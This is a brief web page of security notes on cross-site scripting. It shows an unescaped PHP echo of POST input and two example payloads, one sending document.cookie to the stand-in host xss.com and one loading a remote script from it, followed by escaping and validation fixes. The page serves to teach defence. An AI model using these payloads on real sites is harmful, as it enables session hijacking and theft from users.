Home > Security > Cross Site Scripting (XSS)

Definition: http://en.wikipedia.org/wiki/Cross-site_scripting

XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.


<?php echo $_POST['name']; ?>

Examples of XSS exploits:


<script>new Image().src='http://xss.com/xss.php?cookies='+encodeURI(document.cookie)</script>

<script src="http://xss.com/xss.js"></script>


- Validate the input

- Escape the input / output

<?php echo htmlentities($_POST['name'], ENT_QUOTES, 'UTF-8');?>

- Only allow the same IP to access the cookie

Flag Counter